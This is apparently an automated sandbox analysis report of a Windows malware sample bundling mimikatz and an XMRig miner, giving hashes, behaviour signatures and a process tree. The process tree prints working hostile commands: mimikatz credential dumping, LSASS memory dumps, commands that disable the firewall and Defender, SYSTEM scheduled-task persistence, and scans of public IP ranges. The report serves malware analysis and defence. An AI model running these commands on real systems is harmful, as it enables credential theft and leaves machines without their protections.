Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    27-10-2024 06:33

General

  • Target

    2024-10-27_488e92b90240c99f73f737740c2a4dc2_hacktools_icedid_mimikatz.exe

  • Size

    8.6MB

  • MD5

    488e92b90240c99f73f737740c2a4dc2

  • SHA1

    9a960b7851b46e3dd71e9d8ef1d8d646fb2bf6b3

  • SHA256

    06158967807a5595f1ab13732cb13f7b8465d4103e0dd450b084da4378da6efd

  • SHA512

    8124f4d4bedd406d3144cc902b621072a70e4607389dd284afb9bd75ad9a731b1208a4cfb0821481356f5b80624e871309f41ed4b956d0ea5ead8f651306f5eb

  • SSDEEP

    98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (28347) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 19 IoCs
  • Loads dropped DLL 25 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 12 IoCs
  • UPX packed file 37 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 31 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:468
      • C:\Windows\TEMP\gzkauijfb\sgicvp.exe
        "C:\Windows\TEMP\gzkauijfb\sgicvp.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1532
    • C:\Users\Admin\AppData\Local\Temp\2024-10-27_488e92b90240c99f73f737740c2a4dc2_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-10-27_488e92b90240c99f73f737740c2a4dc2_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3000
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tusfgtaa\huitpgn.exe
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:1748
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:1728
        • C:\Windows\tusfgtaa\huitpgn.exe
          C:\Windows\tusfgtaa\huitpgn.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1048
    • C:\Windows\tusfgtaa\huitpgn.exe
      C:\Windows\tusfgtaa\huitpgn.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2200
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2876
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2836
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2928
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2908
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2912
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
              PID:2944
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            • Modifies data under HKEY_USERS
            PID:2844
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:1724
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2936
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\cjesejeiu\saqtluszq\wpcap.exe /S
            2⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1784
            • C:\Windows\cjesejeiu\saqtluszq\wpcap.exe
              C:\Windows\cjesejeiu\saqtluszq\wpcap.exe /S
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2952
              • C:\Windows\SysWOW64\net.exe
                net stop "Boundary Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2768
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1648
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2668
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1248
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:1528
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2956
              • C:\Windows\SysWOW64\net.exe
                net start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:3008
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2720
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
              PID:548
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2196
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2500
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
                PID:1860
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2288
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:408
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\cjesejeiu\saqtluszq\eejijdjqa.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\cjesejeiu\saqtluszq\Scant.txt
                2⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:3024
                • C:\Windows\cjesejeiu\saqtluszq\eejijdjqa.exe
                  C:\Windows\cjesejeiu\saqtluszq\eejijdjqa.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\cjesejeiu\saqtluszq\Scant.txt
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:3064
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\cjesejeiu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\cjesejeiu\Corporate\log.txt
                2⤵
                • Loads dropped DLL
                • Drops file in Windows directory
                PID:1316
                • C:\Windows\cjesejeiu\Corporate\vfshost.exe
                  C:\Windows\cjesejeiu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2536
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "wnstpqclc" /ru system /tr "cmd /c C:\Windows\ime\huitpgn.exe"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1792
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1512
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "wnstpqclc" /ru system /tr "cmd /c C:\Windows\ime\huitpgn.exe"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2464
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "utthtbtws" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tusfgtaa\huitpgn.exe /p everyone:F"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1676
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1964
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "utthtbtws" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tusfgtaa\huitpgn.exe /p everyone:F"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1944
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tuzqilztc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\gzkauijfb\sgicvp.exe /p everyone:F"
                2⤵
                  PID:2280
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                      PID:2412
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "tuzqilztc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\gzkauijfb\sgicvp.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:2120
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • Modifies data under HKEY_USERS
                    PID:1972
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:2100
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • Modifies data under HKEY_USERS
                    PID:840
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:2804
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • Modifies data under HKEY_USERS
                    PID:2816
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • Modifies data under HKEY_USERS
                    PID:2844
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • Modifies data under HKEY_USERS
                    PID:1724
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2800
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2528
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:1664
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1092
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • Modifies data under HKEY_USERS
                    PID:2768
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop SharedAccess
                    2⤵
                      PID:2668
                      • C:\Windows\SysWOW64\net.exe
                        net stop SharedAccess
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1764
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop SharedAccess
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:1160
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh firewall set opmode mode=disable
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1760
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh firewall set opmode mode=disable
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        • Modifies data under HKEY_USERS
                        PID:1528
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh Advfirewall set allprofiles state off
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:3016
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh Advfirewall set allprofiles state off
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        • Modifies data under HKEY_USERS
                        PID:3028
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop MpsSvc
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1812
                      • C:\Windows\SysWOW64\net.exe
                        net stop MpsSvc
                        3⤵
                          PID:2204
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop MpsSvc
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:2232
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop WinDefend
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2496
                        • C:\Windows\SysWOW64\net.exe
                          net stop WinDefend
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2540
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop WinDefend
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:2664
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop wuauserv
                        2⤵
                          PID:1704
                          • C:\Windows\SysWOW64\net.exe
                            net stop wuauserv
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1620
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop wuauserv
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2348
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config MpsSvc start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:2552
                          • C:\Windows\SysWOW64\sc.exe
                            sc config MpsSvc start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:1384
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config SharedAccess start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:2056
                          • C:\Windows\SysWOW64\sc.exe
                            sc config SharedAccess start= disabled
                            3⤵
                            • Launches sc.exe
                            PID:2076
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config WinDefend start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:548
                          • C:\Windows\SysWOW64\sc.exe
                            sc config WinDefend start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:3024
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config wuauserv start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:2248
                          • C:\Windows\SysWOW64\sc.exe
                            sc config wuauserv start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:680
                        • C:\Windows\TEMP\xohudmc.exe
                          C:\Windows\TEMP\xohudmc.exe
                          2⤵
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          • Suspicious use of SetWindowsHookEx
                          PID:1000
                        • C:\Windows\TEMP\cjesejeiu\quqjwwsff.exe
                          C:\Windows\TEMP\cjesejeiu\quqjwwsff.exe -accepteula -mp 468 C:\Windows\TEMP\cjesejeiu\468.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:768
                        • C:\Windows\TEMP\cjesejeiu\quqjwwsff.exe
                          C:\Windows\TEMP\cjesejeiu\quqjwwsff.exe -accepteula -mp 1112 C:\Windows\TEMP\cjesejeiu\1112.dmp
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2412
                        • C:\Windows\TEMP\cjesejeiu\quqjwwsff.exe
                          C:\Windows\TEMP\cjesejeiu\quqjwwsff.exe -accepteula -mp 1176 C:\Windows\TEMP\cjesejeiu\1176.dmp
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1628
                        • C:\Windows\TEMP\cjesejeiu\quqjwwsff.exe
                          C:\Windows\TEMP\cjesejeiu\quqjwwsff.exe -accepteula -mp 552 C:\Windows\TEMP\cjesejeiu\552.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1796
                        • C:\Windows\TEMP\cjesejeiu\quqjwwsff.exe
                          C:\Windows\TEMP\cjesejeiu\quqjwwsff.exe -accepteula -mp 1044 C:\Windows\TEMP\cjesejeiu\1044.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1968
                        • C:\Windows\TEMP\cjesejeiu\quqjwwsff.exe
                          C:\Windows\TEMP\cjesejeiu\quqjwwsff.exe -accepteula -mp 1652 C:\Windows\TEMP\cjesejeiu\1652.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2848
                        • C:\Windows\TEMP\cjesejeiu\quqjwwsff.exe
                          C:\Windows\TEMP\cjesejeiu\quqjwwsff.exe -accepteula -mp 2212 C:\Windows\TEMP\cjesejeiu\2212.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2936
                        • C:\Windows\TEMP\cjesejeiu\quqjwwsff.exe
                          C:\Windows\TEMP\cjesejeiu\quqjwwsff.exe -accepteula -mp 892 C:\Windows\TEMP\cjesejeiu\892.dmp
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:316
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c C:\Windows\cjesejeiu\saqtluszq\scan.bat
                          2⤵
                          • Loads dropped DLL
                          PID:2248
                          • C:\Windows\cjesejeiu\saqtluszq\lbtjpqfsw.exe
                            lbtjpqfsw.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save
                            3⤵
                            • Executes dropped EXE
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            PID:1372
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:2564
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            3⤵
                              PID:1976
                            • C:\Windows\SysWOW64\cacls.exe
                              cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                              3⤵
                                PID:4080
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:2584
                              • C:\Windows\SysWOW64\cacls.exe
                                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:3928
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                3⤵
                                  PID:2624
                                • C:\Windows\SysWOW64\cacls.exe
                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                  3⤵
                                    PID:1720
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
                                1⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1888
                              • C:\Windows\SysWOW64\dqljao.exe
                                C:\Windows\SysWOW64\dqljao.exe
                                1⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of SetWindowsHookEx
                                PID:868
                              • C:\Windows\system32\taskeng.exe
                                taskeng.exe {2EB60826-7630-4610-89C0-B6CAABA937B9} S-1-5-18:NT AUTHORITY\System:Service:
                                1⤵
                                  PID:2956
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tusfgtaa\huitpgn.exe /p everyone:F
                                    2⤵
                                      PID:2080
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                          PID:2964
                                        • C:\Windows\system32\cacls.exe
                                          cacls C:\Windows\tusfgtaa\huitpgn.exe /p everyone:F
                                          3⤵
                                            PID:2068
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\gzkauijfb\sgicvp.exe /p everyone:F
                                          2⤵
                                            PID:3020
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                              3⤵
                                                PID:848
                                              • C:\Windows\system32\cacls.exe
                                                cacls C:\Windows\TEMP\gzkauijfb\sgicvp.exe /p everyone:F
                                                3⤵
                                                  PID:1632
                                              • C:\Windows\system32\cmd.EXE
                                                C:\Windows\system32\cmd.EXE /c C:\Windows\ime\huitpgn.exe
                                                2⤵
                                                  PID:3012
                                                  • C:\Windows\ime\huitpgn.exe
                                                    C:\Windows\ime\huitpgn.exe
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:2204
                                                • C:\Windows\system32\cmd.EXE
                                                  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tusfgtaa\huitpgn.exe /p everyone:F
                                                  2⤵
                                                    PID:1392
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                      3⤵
                                                        PID:1156
                                                      • C:\Windows\system32\cacls.exe
                                                        cacls C:\Windows\tusfgtaa\huitpgn.exe /p everyone:F
                                                        3⤵
                                                          PID:3548
                                                      • C:\Windows\system32\cmd.EXE
                                                        C:\Windows\system32\cmd.EXE /c C:\Windows\ime\huitpgn.exe
                                                        2⤵
                                                          PID:1936
                                                          • C:\Windows\ime\huitpgn.exe
                                                            C:\Windows\ime\huitpgn.exe
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3184
                                                        • C:\Windows\system32\cmd.EXE
                                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\gzkauijfb\sgicvp.exe /p everyone:F
                                                          2⤵
                                                            PID:3772
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                              3⤵
                                                                PID:3888
                                                              • C:\Windows\system32\cacls.exe
                                                                cacls C:\Windows\TEMP\gzkauijfb\sgicvp.exe /p everyone:F
                                                                3⤵
                                                                  PID:1296

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Windows\SysWOW64\Packet.dll

                                                              Filesize

                                                              95KB

                                                              MD5

                                                              86316be34481c1ed5b792169312673fd

                                                              SHA1

                                                              6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                                              SHA256

                                                              49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                                              SHA512

                                                              3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                                            • C:\Windows\SysWOW64\wpcap.dll

                                                              Filesize

                                                              275KB

                                                              MD5

                                                              4633b298d57014627831ccac89a2c50b

                                                              SHA1

                                                              e5f449766722c5c25fa02b065d22a854b6a32a5b

                                                              SHA256

                                                              b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                                              SHA512

